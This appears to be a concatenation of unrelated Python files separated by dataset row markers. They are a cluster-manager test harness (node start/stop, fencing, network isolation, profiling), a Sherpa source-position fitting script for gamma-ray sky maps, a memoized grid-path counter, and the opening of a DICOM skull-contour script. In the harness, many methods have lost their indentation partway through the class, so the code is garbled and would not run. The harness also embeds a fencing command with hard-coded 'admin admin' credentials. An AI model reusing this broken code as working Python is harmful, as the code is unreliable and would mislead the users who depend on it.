        self.Env = Environment
        self.__InitialConditions()
        self.clear_cache = 0
        self.TestLoggingLevel=0
        self.data = {
            "up"             : "up",        # Status meaning up
            "down"           : "down",      # Status meaning down
            "StonithCmd"     : "stonith -t baytech -p '10.10.10.100 admin admin' %s",
            "DeadTime"       : 30,          # Max time to detect dead node...
            "StartTime"      : 90,          # Max time to start up
    #
    # These next values need to be overridden in the derived class.
    #
            "Name"           : None,
            "StartCmd"       : None,
            "StopCmd"        : None,
            "StatusCmd"      : None,
            #"RereadCmd"      : None,
            "BreakCommCmd"   : None,
            "FixCommCmd"     : None,
            #"TestConfigDir"  : None,
            "LogFileName"    : None,

            #"Pat:Master_started"   : None,
            #"Pat:Slave_started"    : None,
            "Pat:We_stopped"       : None,
            "Pat:They_stopped"     : None,

            "BadRegexes"     : None,        # A set of "bad news" regexes
                                            # to apply to the log
        }

        self.rsh = self.Env.rsh
        # Our belief about each node's state ("up"/"down"), kept in sync
        # by StataCM and the start/stop helpers.
        self.ShouldBeStatus={}
        self.ns = NodeStatus(self.Env)
        self.OurNode=string.lower(os.uname()[1])
    def key_for_node(self, node):
        # Map a node name to the key used in comm-break/fix commands;
        # identity by default, overridable by subclasses.
        return node
    def errorstoignore(self):
        '''Return list of errors which are 'normal' and should be ignored'''
        # Base class ignores nothing; subclasses add their known noise.
        return []
    def log(self, args):
        # Delegate to the lab environment's logger.
        self.Env.log(args)
    def debug(self, args):
        # Delegate to the lab environment's debug logger.
        self.Env.debug(args)
    def prepare(self):
        '''Finish the Initialization process. Prepare to test...'''
        # Seed our state bookkeeping from each node's actual status, and
        # clear any stale communication blocks left by earlier runs.
        for node in self.Env["nodes"]:
            if self.StataCM(node):
                self.ShouldBeStatus[node]="up"
            else:
                self.ShouldBeStatus[node]="down"

            self.unisolate_node(node)
def upcount(self):
'''How many nodes are up?'''
count=0
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node]=="up":
count=count+1
return count
    def install_helper(self, filename, nodes=None):
        # Copy a helper file from the local CTS_home to the same path on
        # each node (default: every cluster node); returns the full path.
        file_with_path="%s/%s" % (CTSvars.CTS_home, filename)
        if not nodes:
            nodes = self.Env["nodes"]

        self.debug("Installing %s to %s on %s" % (filename, CTSvars.CTS_home, repr(self.Env["nodes"])))
        for node in nodes:
            self.rsh(node, "mkdir -p %s" % CTSvars.CTS_home)
            self.rsh.cp(file_with_path, "root@%s:%s" % (node, file_with_path))
        return file_with_path
    def install_config(self, node):
        # Placeholder: subclasses install their CM configuration here.
        return None
    def clear_all_caches(self):
        # Remove the heartbeat hostcache on every down node so autojoin
        # gets exercised; only active when clear_cache is enabled.
        if self.clear_cache:
            for node in self.Env["nodes"]:
                if self.ShouldBeStatus[node] == "down":
                    self.debug("Removing cache file on: "+node)
                    self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")
                else:
                    self.debug("NOT Removing cache file on: "+node)
    def prepare_fencing_watcher(self, node):
        """Return a LogWatcher armed for fencing of down peers, or None.

        Starting 'node' may grant the cluster quorum, at which point it may
        fence peers it believes are down; watch for those events so
        fencing_cleanup can reconcile our state afterwards.
        """
        # If we don't have quorum now but get it as a result of starting this node,
        # then a bunch of nodes might get fenced
        if self.HasQuorum(None):
            return None

        # Subclass must define the fencing patterns for this to work.
        if not self.has_key("Pat:They_fenced"):
            return None

        if not self.has_key("Pat:They_fenced_offset"):
            return None

        stonith = None
        stonithPats = []
        for peer in self.Env["nodes"]:
            if peer != node and self.ShouldBeStatus[peer] != "up":
                stonithPats.append(self["Pat:They_fenced"] % peer)

        # Look for STONITH ops, depending on Env["at-boot"] we might need to change the nodes status
        stonith = LogWatcher(self.Env, self["LogFileName"], stonithPats, "StartaCM", 0)
        stonith.setwatch()
        return stonith
def fencing_cleanup(self, node, stonith):
peer_list = []
# If we just started a node, we may now have quorum (and permission to fence)
# Make sure everyone is online before continuing
self.ns.WaitForAllNodesToComeUp(self.Env["nodes"])
if not stonith:
return peer_list
if not self.HasQuorum(None) and len(self.Env["nodes"]) > 2:
# We didn't gain quorum - we shouldn't have shot anyone
return peer_list
# Now see if any states need to be updated
self.debug("looking for: " + repr(stonith.regexes))
shot = stonith.look(0)
while shot:
line = repr(shot)
self.debug("Found: "+ line)
# Extract node name
start = line.find(self["Pat:They_fenced_offset"]) + len(self["Pat:They_fenced_offset"])
peer = line[start:].split("' ")[0]
self.debug("Found peer: "+ peer)
peer_list.append(peer)
self.ShouldBeStatus[peer]="down"
self.log(" Peer %s was fenced as a result of %s starting" % (peer, node))
# Get the next one
shot = stonith.look(60)
# Poll until it comes up
if self.Env["at-boot"]:
if not self.StataCM(peer):
time.sleep(self["StartTime"])
if not self.StataCM(peer):
self.log("ERROR: Peer %s failed to restart after being fenced" % peer)
return None
self.ShouldBeStatus[peer]="up"
return peer_list
    def StartaCM(self, node, verbose=False):
        '''Start up the cluster manager on a given node'''
        # Returns 1 on success (or if already up), None on failure.
        if verbose: self.log("Starting %s on node %s" %(self["Name"], node))
        else: self.debug("Starting %s on node %s" %(self["Name"], node))
        ret = 1

        if not self.ShouldBeStatus.has_key(node):
            self.ShouldBeStatus[node] = "down"

        if self.ShouldBeStatus[node] != "down":
            return 1

        patterns = []
        # Technically we should always be able to notice ourselves starting
        patterns.append(self["Pat:Local_started"] % node)
        if self.upcount() == 0:
            patterns.append(self["Pat:Master_started"] % node)
        else:
            patterns.append(self["Pat:Slave_started"] % node)

        # Arm the watcher before issuing the start command so no startup
        # messages can slip past unseen.
        watch = LogWatcher(
            self.Env, self["LogFileName"], patterns, "StartaCM", self["StartTime"]+10)

        watch.setwatch()

        self.install_config(node)

        # Status is transient while the start is in flight.
        self.ShouldBeStatus[node] = "any"
        if self.StataCM(node) and self.cluster_stable(self["DeadTime"]):
            self.log ("%s was already started" %(node))
            return 1

        # Clear out the host cache so autojoin can be exercised
        if self.clear_cache:
            self.debug("Removing cache file on: "+node)
            self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")

        if not(self.Env["valgrind-tests"]):
            startCmd = self["StartCmd"]
        else:
            if self.Env["valgrind-prefix"]:
                prefix = self.Env["valgrind-prefix"]
            else:
                prefix = "cts"

            # Wrap the start command so CM processes run under valgrind.
            startCmd = """G_SLICE=always-malloc HA_VALGRIND_ENABLED='%s' VALGRIND_OPTS='%s --log-file=/tmp/%s-%s.valgrind' %s""" % (
                self.Env["valgrind-procs"], self.Env["valgrind-opts"], prefix, """%p""", self["StartCmd"])

        # Starting this node may grant quorum and trigger fencing of
        # peers; watch for that so we can reconcile state afterwards.
        stonith = self.prepare_fencing_watcher(node)

        if self.rsh(node, startCmd) != 0:
            self.log ("Warn: Start command failed on node %s" %(node))
            return None

        self.ShouldBeStatus[node]="up"
        watch_result = watch.lookforall()

        self.fencing_cleanup(node, stonith)

        if watch.unmatched:
            for regex in watch.unmatched:
                self.log ("Warn: Startup pattern not found: %s" %(regex))

        if watch_result and self.cluster_stable(self["DeadTime"]):
            #self.debug("Found match: "+ repr(watch_result))
            return 1

        # Fall back to a direct status probe if the log patterns missed.
        elif self.StataCM(node) and self.cluster_stable(self["DeadTime"]):
            return 1

        self.log ("Warn: Start failed for node %s" %(node))
        return None
    def StartaCMnoBlock(self, node, verbose=False):
        '''Start up the cluster manager on a given node with none-block mode'''
        # Fire-and-forget variant of StartaCM: no log watching, no
        # verification; optimistically marks the node up and returns 1.
        if verbose: self.log("Starting %s on node %s" %(self["Name"], node))
        else: self.debug("Starting %s on node %s" %(self["Name"], node))

        # Clear out the host cache so autojoin can be exercised
        if self.clear_cache:
            self.debug("Removing cache file on: "+node)
            self.rsh(node, "rm -f "+CTSvars.HA_VARLIBHBDIR+"/hostcache")

        if not(self.Env["valgrind-tests"]):
            startCmd = self["StartCmd"]
        else:
            if self.Env["valgrind-prefix"]:
                prefix = self.Env["valgrind-prefix"]
            else:
                prefix = "cts"

            # Wrap the start command so CM processes run under valgrind.
            startCmd = """G_SLICE=always-malloc HA_VALGRIND_ENABLED='%s' VALGRIND_OPTS='%s --log-file=/tmp/%s-%s.valgrind' %s""" % (
                self.Env["valgrind-procs"], self.Env["valgrind-opts"], prefix, """%p""", self["StartCmd"])

        self.rsh(node, startCmd, synchronous=0)
        self.ShouldBeStatus[node]="up"
        return 1
    def StopaCM(self, node, verbose=False):
        '''Stop the cluster manager on a given node'''
        # Returns 1 on success (or if already down), None on failure.
        if verbose: self.log("Stopping %s on node %s" %(self["Name"], node))
        else: self.debug("Stopping %s on node %s" %(self["Name"], node))

        if self.ShouldBeStatus[node] != "up":
            return 1

        if self.rsh(node, self["StopCmd"]) == 0:
            # Make sure we can continue even if corosync leaks
            self.rsh(node, "rm -f /dev/shm/fdata-*")
            self.ShouldBeStatus[node]="down"
            self.cluster_stable(self["DeadTime"])
            return 1
        else:
            self.log ("Could not stop %s on node %s" %(self["Name"], node))

        return None
    def StopaCMnoBlock(self, node):
        '''Stop the cluster manager on a given node with none-block mode'''
        # Fire-and-forget variant of StopaCM: no verification; marks the
        # node down optimistically and returns 1.
        self.debug("Stopping %s on node %s" %(self["Name"], node))

        self.rsh(node, self["StopCmd"], synchronous=0)
        self.ShouldBeStatus[node]="down"
        return 1
    def cluster_stable(self, timeout = None):
        # Base implementation just waits a fixed settle time; the
        # 'timeout' argument is unused here (subclasses may honour it).
        time.sleep(self["StableTime"])
        return 1
    def node_stable(self, node):
        # Base implementation assumes nodes are always stable.
        return 1
    def RereadCM(self, node):
        '''Force the cluster manager on a given node to reread its config
        This may be a no-op on certain cluster managers.
        '''
        # Returns 1 on success, None on failure.
        rc=self.rsh(node, self["RereadCmd"])
        if rc == 0:
            return 1
        else:
            self.log ("Could not force %s on node %s to reread its config"
                      % (self["Name"], node))
        return None
    def StataCM(self, node):
        '''Report the status of the cluster manager on a given node'''
        # The CM is considered up unless StatusCmd output says 'stopped'.
        out=self.rsh(node, self["StatusCmd"], 1)
        ret= (string.find(out, 'stopped') == -1)

        try:
            # Warn whenever observed reality disagrees with our records.
            if ret:
                if self.ShouldBeStatus[node] == "down":
                    self.log(
                        "Node status for %s is %s but we think it should be %s"
                        %        (node, "up", self.ShouldBeStatus[node]))
            else:
                if self.ShouldBeStatus[node] == "up":
                    self.log(
                        "Node status for %s is %s but we think it should be %s"
                        %        (node, "down", self.ShouldBeStatus[node]))
        except KeyError:        pass

        # Bring our bookkeeping into line with what we just observed.
        if ret:        self.ShouldBeStatus[node]="up"
        else:        self.ShouldBeStatus[node]="down"
        return ret
def startall(self, nodelist=None, verbose=False):
'''Start the cluster manager on every node in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
ret = 1
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in nodelist:
if self.ShouldBeStatus[node] == "down":
if not self.StartaCM(node, verbose=verbose):
ret = 0
return ret
def stopall(self, nodelist=None, verbose=False):
'''Stop the cluster managers on every node in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
ret = 1
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node] == "up":
if not self.StopaCM(node, verbose=verbose):
ret = 0
return ret
def rereadall(self, nodelist=None):
'''Force the cluster managers on every node in the cluster
to reread their config files. We can do it on a subset of the
cluster if nodelist is not None.
'''
map = {}
if not nodelist:
nodelist=self.Env["nodes"]
for node in self.Env["nodes"]:
if self.ShouldBeStatus[node] == "up":
self.RereadCM(node)
def statall(self, nodelist=None):
'''Return the status of the cluster managers in the cluster.
We can do it on a subset of the cluster if nodelist is not None.
'''
result={}
if not nodelist:
nodelist=self.Env["nodes"]
for node in nodelist:
if self.StataCM(node):
result[node] = "up"
else:
result[node] = "down"
return result
    def isolate_node(self, target, nodes=None):
        '''isolate the communication between the nodes'''
        # Cut traffic from 'target' to each node in 'nodes' (default: all).
        # Returns 1 on success, None as soon as one break command fails.
        if not nodes:
            nodes = self.Env["nodes"]

        for node in nodes:
            if node != target:
                rc = self.rsh(target, self["BreakCommCmd"] % self.key_for_node(node))
                if rc != 0:
                    self.log("Could not break the communication between %s and %s: %d" % (target, node, rc))
                    return None
                else:
                    self.debug("Communication cut between %s and %s" % (target, node))
        return 1
def unisolate_node(self, target, nodes=None):
'''fix the communication between the nodes'''
if not nodes:
nodes = self.Env["nodes"]
for node in nodes:
if node != target:
restored = 0
# Limit the amount of time we have asynchronous connectivity for
# Restore both sides as simultaneously as possible
self.rsh(target, self["FixCommCmd"] % self.key_for_node(node), synchronous=0)
self.rsh(node, self["FixCommCmd"] % self.key_for_node(target), synchronous=0)
self.debug("Communication restored between %s and %s" % (target, node))
def reducecomm_node(self,node):
'''reduce the communication between the nodes'''
rc = self.rsh(node, self["ReduceCommCmd"]%(self.Env["XmitLoss"],self.Env["RecvLoss"]))
if rc == 0:
return 1
else:
self.log("Could not reduce the communication between the nodes from node: %s" % node)
return None
def restorecomm_node(self,node):
'''restore the saved communication between the nodes'''
rc = 0
if float(self.Env["XmitLoss"])!=0 or float(self.Env["RecvLoss"])!=0 :
rc = self.rsh(node, self["RestoreCommCmd"]);
if rc == 0:
return 1
else:
self.log("Could not restore the communication between the nodes from node: %s" % node)
return None
    def HasQuorum(self, node_list):
        "Return TRUE if the cluster currently has quorum"
        # If we are auditing a partition, then one side will
        # have quorum and the other not.
        # So the caller needs to tell us which we are checking
        # If no value for node_list is specified... assume all nodes
        # Abstract: concrete cluster-manager subclasses must override.
        raise ValueError("Abstract Class member (HasQuorum)")
    def Components(self):
        # Abstract: subclasses return the list of killable cluster components.
        raise ValueError("Abstract Class member (Components)")
    def oprofileStart(self, node=None):
        """Start oprofile sampling on one node, or (node=None) on every
        node listed in Env["oprofile"]."""
        if not node:
            # Fan out: recurse once per configured node.
            for n in self.Env["oprofile"]:
                self.oprofileStart(n)
        elif node in self.Env["oprofile"]:
            self.debug("Enabling oprofile on %s" % node)
            self.rsh(node, "opcontrol --init")
            self.rsh(node, "opcontrol --setup --no-vmlinux --separate=lib --callgraph=20 --image=all")
            self.rsh(node, "opcontrol --start")
            # NOTE(review): --reset after --start presumably discards samples
            # collected during setup so profiling starts clean -- confirm.
            self.rsh(node, "opcontrol --reset")
def oprofileSave(self, test, node=None):
if not node:
for n in self.Env["oprofile"]:
self.oprofileSave(test, n)
elif node in self.Env["oprofile"]:
self.rsh(node, "opcontrol --dump")
self.rsh(node, "opcontrol --save=cts.%d" % test)
# Read back with: opreport -l session:cts.0 image:/usr/lib/heartbeat/c*
if None:
self.rsh(node, "opcontrol --reset")
else:
self.oprofileStop(node)
self.oprofileStart(node)
    def oprofileStop(self, node=None):
        """Stop oprofile and discard pending samples on one node, or
        (node=None) on every node listed in Env["oprofile"]."""
        if not node:
            for n in self.Env["oprofile"]:
                self.oprofileStop(n)
        elif node in self.Env["oprofile"]:
            self.debug("Stopping oprofile on %s" % node)
            self.rsh(node, "opcontrol --reset")
            # stderr is merged then stdout discarded (note the 2>&1 ordering).
            self.rsh(node, "opcontrol --shutdown 2>&1 > /dev/null")
class Resource:
    '''
    This is an HA resource (not a resource group).
    A resource group is just an ordered list of Resource objects.
    '''
    def __init__(self, cm, rsctype=None, instance=None):
        self.CM = cm                 # owning cluster-manager object
        self.ResourceType = rsctype  # resource type string
        # NOTE(review): this attribute shadows the Instance() method below on
        # every constructed object -- r.Instance is the raw value and the
        # method is unreachable through instances.  Left unrenamed because
        # external callers may rely on attribute access; confirm before fixing.
        self.Instance = instance
        self.needs_quorum = 1
    def Type(self):
        """Return the resource type string."""
        return self.ResourceType
    def Instance(self, nodename):
        """Return the instance identifier (shadowed -- see __init__)."""
        return self.Instance
    def IsRunningOn(self, nodename):
        '''
        This member function returns true if our resource is running
        on the given node in the cluster.
        It is analagous to the "status" operation on SystemV init scripts and
        heartbeat scripts. FailSafe calls it the "exclusive" operation.
        '''
        # Abstract; unreachable "return None" after raise removed.
        raise ValueError("Abstract Class member (IsRunningOn)")
    def IsWorkingCorrectly(self, nodename):
        '''
        This member function returns true if our resource is operating
        correctly on the given node in the cluster.
        Heartbeat does not require this operation, but it might be called
        the Monitor operation, which is what FailSafe calls it.
        For remotely monitorable resources (like IP addresses), they *should*
        be monitored remotely for testing.
        '''
        raise ValueError("Abstract Class member (IsWorkingCorrectly)")
    def Start(self, nodename):
        '''
        This member function starts or activates the resource.
        '''
        raise ValueError("Abstract Class member (Start)")
    def Stop(self, nodename):
        '''
        This member function stops or deactivates the resource.
        '''
        raise ValueError("Abstract Class member (Stop)")
    def __repr__(self):
        # "{type::instance}" when an instance name is set, else "{type}".
        if (self.Instance and len(self.Instance) > 1):
            return "{" + self.ResourceType + "::" + self.Instance + "}"
        else:
            return "{" + self.ResourceType + "}"
class Component:
    """Abstract piece of the cluster stack that a test can kill."""
    def kill(self, node):
        # Default implementation does nothing and returns None.
        None
class Process(Component):
    """A Component backed by an OS process, killed via 'killall -9'."""
    def __init__(self, cm, name, process=None, dc_only=0, pats=None, dc_pats=None, badnews_ignore=None, triggersreboot=0):
        # The original used mutable list defaults (pats=[], dc_pats=[],
        # badnews_ignore=[]), which are shared across every instance that
        # doesn't pass them explicitly; None sentinels give each instance a
        # fresh list while keeping the call signature backward-compatible.
        self.name = str(name)
        self.dc_only = dc_only              # patterns apply only on the DC
        self.pats = [] if pats is None else pats
        self.dc_pats = [] if dc_pats is None else dc_pats
        self.CM = cm
        self.badnews_ignore = [] if badnews_ignore is None else badnews_ignore
        self.triggersreboot = triggersreboot
        # Killable process name defaults to the component name.
        if process:
            self.proc = str(process)
        else:
            self.proc = str(name)
        self.KillCmd = "killall -9 " + self.proc
    def kill(self, node):
        """SIGKILL the process on node; return 1 on success, None on failure."""
        if self.CM.rsh(node, self.KillCmd) != 0:
            self.CM.log ("ERROR: Kill %s failed on node %s" %(self.name,node))
            return None
        return 1
|
12,442 | 9802e47b10102d329ebfb007f714b8ab4586af9a | __author__ = 'Sajan Kumar'
# These are the libraries you need for doing the source fitting analysis
# Essentially you need root pyroot and Sherpa package
import numpy as np
from matplotlib import pyplot as plt
from sherpa.fit import Fit
from sherpa import models
from sherpa.data import Data1D, Data2D
from sherpa.stats import Cash, CStat
from sherpa.estmethods import Confidence
from sherpa import optmethods
import sys
sys.path.append("/Users/kumar/research/software/root_install/root_build_6.14.00/lib")
import ROOT
import matplotlib.lines
import matplotlib.patches as patches
import sherpa.astro.models as md
from MathFunction import *
from sherpa.plot import RegionProjection
from sherpa.plot import IntervalProjection
# --------------------------------------------------------------
class VSourcePositionFitting(object):
    """Fit a 2D source model (Gaussian or King/Beta) to an Eventdisplay
    sky map stored in a ROOT file, after fitting a constant background
    on the normalized Off map."""
    def __init__(self, dir, filename):
        # Full path to the Eventdisplay anasum ROOT file.
        self.datafile = str(dir) + "/" + str(filename)
    def readEDFile(self):
        """Open the ROOT file and read the sky-map centre (RA, Dec) from
        the run-summary tree into self.Ra / self.Dec."""
        self.Rfile = ROOT.TFile(self.datafile, "read")
        tRunsummary = self.Rfile.Get("total_1/stereo/tRunSummary")
        crval1, crval2 = [], []
        for i, events in enumerate(tRunsummary):
            crval1.append(events.SkyMapCentreRAJ2000)
            crval2.append(events.SkyMapCentreDecJ2000)
        # All runs share the same map centre; take the first entry.
        self.Ra = crval1[0]
        self.Dec = crval2[0]
        # return self.Ra, self.Dec
    def extract_data(self, hmap, deg=0.3):
        """Extract a square (+-deg) region around the map centre from a
        ROOT 2D histogram into a numpy array."""
        xbinlow = hmap.GetXaxis().FindBin(-deg)
        xbinhigh = hmap.GetXaxis().FindBin(deg)
        ybinlow = hmap.GetYaxis().FindBin(-deg)
        ybinhigh = hmap.GetYaxis().FindBin(deg)
        print(xbinlow, xbinhigh, ybinlow, ybinhigh)
        xrange = xbinhigh - xbinlow + 1
        yrange = ybinhigh - ybinlow + 1
        z = np.zeros((xrange, yrange))
        for i in range(xrange):
            for j in range(yrange):
                # NOTE(review): axes deliberately swapped here -- presumably
                # transposing ROOT's (x, y) binning into row-major numpy;
                # confirm against the plotting orientation.
                z[i, j] = hmap.GetBinContent(ybinlow + j, xbinlow + i)
        return z
    def get_maps(self, deg=0.3):
        """Load the uncorrelated On, Off and alpha maps and build the
        normalized Off map (Off * alpha).  Returns the On map."""
        self.deg = deg
        OnMap = "total_1/stereo/skyHistograms/hmap_stereoUC_on"
        hmap_UC_on = self.Rfile.Get(OnMap)
        OffMap = "total_1/stereo/skyHistograms/hmap_stereoUC_off"
        hmap_UC_off = self.Rfile.Get(OffMap)
        alphaMap = "total_1/stereo/skyHistograms/hmap_alphaNormUC_off"
        hmap_UC_alpha = self.Rfile.Get(alphaMap)
        self.On = self.extract_data(hmap_UC_on, deg)
        self.Off = self.extract_data(hmap_UC_off, deg)
        self.alpha = self.extract_data(hmap_UC_alpha, deg)
        self.NormOff = self.Off * self.alpha
        return self.On
    def fit(self, xpos, ypos, gaus=True):
        """Fit the On map with background + source.

        gaus=True fits a 2D Gaussian; gaus=False fits a Beta2D (King)
        profile with frozen alpha.  (xpos, ypos) seed the source position.
        Results (position, errors, containment radius) are stored on self
        and printed."""
        self.Model = gaus
        binsize = 0.05  # map bin size in degrees
        x = np.arange(-self.deg, self.deg + binsize, binsize)
        y = np.arange(-self.deg, self.deg + binsize, binsize)
        x_range, y_range = np.meshgrid(x, y)
        #Use a constant 2D function to fit the background on Normalized Off map and then freeze this parameter
        # when fit the Gauss or King function on On data
        bg = models.Const2D('bg')
        d_b = Data2D('bg', x_range.flatten(), y_range.flatten(), self.NormOff.flatten(), shape=x_range.shape)
        #
        # print(bg)
        #
        f_b = Fit(d_b, bg, CStat(), optmethods.NelderMead())
        res_bg = f_b.fit()
        bg.c0.freeze()
        # print(bg.c0)
        if gaus:
            # Gaussian source model with bounded amplitude/width/position.
            source = models.Gauss2D('source')
            source.fwhm = 0.08
            source.ampl = 100
            source.ampl.min = 0
            source.ampl.max = 500
            # source.fwhm.min = 0
            source.fwhm.max = 0.5
            source.xpos.min = -self.deg
            source.xpos.max = self.deg
            source.ypos.min = -self.deg
            source.ypos.max = self.deg
            source.xpos.val = xpos
            source.ypos.val = ypos
            OnSourceModel = source + bg
            d_s = Data2D('signal', x_range.flatten(), y_range.flatten(), self.On.flatten(), shape=x_range.shape)
            f_s = Fit(d_s, OnSourceModel, CStat(), optmethods.NelderMead())
            res2 = f_s.fit()
            print(res2.format())
            # Confidence-interval error estimation on the fitted parameters.
            f_s.method = optmethods.NelderMead()
            f_s.estmethod = Confidence()
            err_s = f_s.est_errors()
            param = predict(err_s)
            # print(param)
            print(err_s.format())
            # Convert FWHM (value, error) into a 68% containment radius.
            self.containmentR, self.containmentRerr = convertFWHMto68(param['fwhm'][0]), convertFWHMto68(
                param['fwhm'][1])
            self.x, self.y, self.xerr, self.yerr = param['xpos'][0], param['ypos'][0], \
                                                   param['xpos'][1], param['ypos'][1]
            convert_derotated_RADECJ2000(self.Ra, self.Dec, self.x, self.y, self.xerr, self.yerr)
            # print("Source sigma (PSF)")
            print("68% Containment radius = {:.3f} +/- {:.3f} degrees".format(self.containmentR, self.containmentRerr))
            print("----Containment radius in ArcMinute----\n")
            print('68% Containment radius= {:.1f} +/- {:.1f}'.format(self.containmentR * 60, self.containmentRerr * 60))
            # print (str(convertFWHMto68(err_s.parvals[0])) + '+/-'+ str(convertFWHMto68(err_s.parmaxes[0])))
        else:
            # King-profile (Beta2D) source model; alpha frozen at 1.95.
            beta = md.Beta2D('beta')
            beta.r0 = 0.04
            beta.alpha = 1.95
            beta.xpos.min = -self.deg
            beta.xpos.max = self.deg
            beta.ypos.min = -self.deg
            beta.ypos.max = self.deg
            beta.r0.max = 0.3
            OnSourceModel = beta + bg
            beta.alpha.freeze()
            d_s = Data2D('signal', x_range.flatten(), y_range.flatten(), self.On.flatten(), shape=x_range.shape)
            f_s = Fit(d_s, OnSourceModel, CStat(), optmethods.NelderMead())
            res2 = f_s.fit()
            print(res2.format())
            f_s.method = optmethods.NelderMead()
            f_s.estmethod = Confidence()
            err_s = f_s.est_errors()
            param = predict(err_s)
            print(err_s.format())
            self.x, self.y, self.xerr, self.yerr = param['xpos'][0], param['ypos'][0], \
                                                   param['xpos'][1], param['ypos'][1]
            convert_derotated_RADECJ2000(self.Ra, self.Dec, self.x, self.y, self.xerr, self.yerr)
            self.r0 = param['r0'][0]
            print("Core radius (r0) = {:.3f} +/- {:.3f}".format(param['r0'][0], param['r0'][1]))
            print("Alpha = {:.3f} +/- {:.3f}".format(param['alpha'][0], param['alpha'][1]))
            # Containment error from the one-sided shift of (r0, alpha).
            Crad = containment_radius(param['r0'][0], param['alpha'][0])
            CradH = containment_radius(param['r0'][0] + param['r0'][1], param['alpha'][0] + param['alpha'][1])
            # CradL = containment_radius(param['r0'][0] - param['r0'][1], param['alpha'][0] - param['alpha'][1])
            Craderr = abs(CradH - Crad)
            print("68% Containment radius = {:.3f} +/- {:.3f}".format(Crad, Craderr))
            '''
            intproj = IntervalProjection()
            intproj.calc(f_s, beta.r0)
            intproj.plot()
            plt.show()
            regproj = RegionProjection()
            # regproj.prepare(min=[1, 0], max=[5, 0.15], nloop=(21, 21))
            regproj.calc(f_s, beta.alpha, beta.r0)
            regproj.contour()
            plt.show()
            '''
            # print("Alpha = {:.3f} +/- {:.3f})".format(param['alpha'][0], param['alpha'][1]))
    def plot_skymap(self):
        """Show the On map with the fitted position (error cross) and
        containment circle overlaid.  Must be called after fit()."""
        plt.imshow(self.On, cmap='rainbow', origin="lower", extent=[-self.deg, self.deg, -self.deg, self.deg])
        plt.plot(self.x - self.xerr, self.y, self.x + self.xerr, self.y, linewidth=2)
        plt.colorbar()
        plt.xlabel("X position on Sky")
        plt.ylabel("Y position on Sky")
        axes = plt.gca()
        # Horizontal and vertical error bars through the fitted centre.
        line1 = matplotlib.lines.Line2D((self.x - self.xerr, self.x + self.xerr), (self.y, self.y), color='black')
        line2 = matplotlib.lines.Line2D((self.x, self.x), (self.y - self.yerr, self.y + self.yerr), color='black')
        axes.add_line(line1)
        axes.add_line(line2)
        # Circle radius: 68% containment for the Gaussian fit, r0 for King.
        if self.Model:
            circle = patches.Circle((self.x, self.y), self.containmentR, color='black', fill=False)
        else:
            circle = patches.Circle((self.x, self.y), self.r0, color='black', fill=False)
        axes.add_patch(circle)
        plt.show()
|
12,443 | 2cf99803cc59f1dd38f8f43d7e72cf8620fc5e0b | #
# The rules to travel: You can go one row down, and/or one colum right.
#
def gridTraveler(m, n, memo):
    """Count the paths through an m-by-n grid moving only down/right,
    memoizing results in the caller-supplied dict."""
    key = f"{m},{n}"
    if key not in memo:
        if m == 0 or n == 0:
            return 0
        if m == 1 and n == 1:
            return 1
        memo[key] = gridTraveler(m - 1, n, memo) + gridTraveler(m, n - 1, memo)
    return memo[key]
# Demo: each call below gets its own fresh memo dictionary.
for rows, cols in ((1, 1), (2, 3), (3, 2), (3, 3)):
    print(gridTraveler(rows, cols, {}))
memo = {}
print(gridTraveler(18, 18, memo))
12,444 | ee0e66c124d9ad718a9641e292c6ad8b80576eb9 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
import numpy as np
from open import load_dicom_folder, dicom_datasets_to_numpy
from icp import icp_wrap
from skimage import measure
from scipy.spatial import distance
import matplotlib.pyplot as plt
from scipy.interpolate import splprep, splev
import copy
from mpl_toolkits.mplot3d import Axes3D
# Mariana Guerra
# Cranial prosthesis modeling
def select_contours(img):
    """
    Evaluates all contours found to select only the ones centered near the image center
    :param img: 2D ndarray of DICOM image converted by dicom_datasets_to_numpy
    :return: list with the wanted contours; list with the central pixel of each wanted contour
    """
    # Find contours at a constant value
    contours = measure.find_contours(img, 300)
    # print("Found " + str(len(contours)) + " contour(s)")
    # Select the nearest contours with respect to the center pixel of the image.
    # skimage returns contour points as (row, col), so the reference point
    # must be (row_center, col_center).  The original built it as
    # (width/2, height/2), mixing the axes for non-square images.
    heigth = img.shape[0]  # number of rows
    width = img.shape[1]   # number of columms
    pixel_ref = (heigth / 2, width / 2)
    # Threshold distance is 10% of images smallest dimension
    dist_thresh = min(width, heigth) * 0.1
    contours_wanted = []
    pixel_mean_array = []
    for contour in contours:
        contour_3d = np.zeros([contour.shape[0], 3])  # 3rd dimension added for later conversion to patient coord space
        contour_3d[:, :2] = contour
        pixel_mean = np.mean(contour, axis=0)  # (row, col) centroid
        if distance.euclidean(pixel_ref, pixel_mean) <= dist_thresh:
            contours_wanted.append(contour_3d)
            pixel_mean_array.append(pixel_mean)
    # print("Set " + str(len(contours_wanted)) + " contours of interest")
    return contours_wanted, pixel_mean_array
def contours_to_patient_coord_sys_and_points_to_skull_axial_axis(datasets, series_arr):
    """
    Transforms the contours to patient coordinate system and stores them in contours_list
    :param datasets: loaded DICOM images by load_dicom_folder
    :param series_arr: 3D ndarray of DICOM image series converted by dicom_datasets_to_numpy
    :return: contours_list: list of lists of 3D ndarrays (contours) for every slice, on patient coord system.
             (mean_points_real and contours_mean_point_list are computed internally but
             NOT returned -- the original docstring claimed all three.)
    """
    mean_points_real = [0, 0, 0]  # to storage points on the skull axis line (healthy slices)
    contours_list = [None] * series_arr.shape[2]  # list of all contours of all slices
    contours_mean_point_list = [None] * series_arr.shape[2]  # list of all mean points of contours of interest
    rotation_info_list = []  # to storage rotation info found by the icp (unused while symmetry code is commented out)
    # Converts all contours for patient coordinate space based on DICOM tag information
    for i in range(series_arr.shape[2]):
        img = series_arr[:, :, i]
        # Collecting image information
        img_orient_pat = [float(x) for x in list(datasets[i].ImageOrientationPatient)]
        img_position_pat = [float(x) for x in list(datasets[i].ImagePositionPatient)]
        pixel_spacing = [float(x) for x in list(datasets[i].PixelSpacing)]
        # Row/column direction cosines of the image plane.
        iop1 = np.array(img_orient_pat[0:3])
        iop2 = np.array(img_orient_pat[3:6])
        # Finding contours
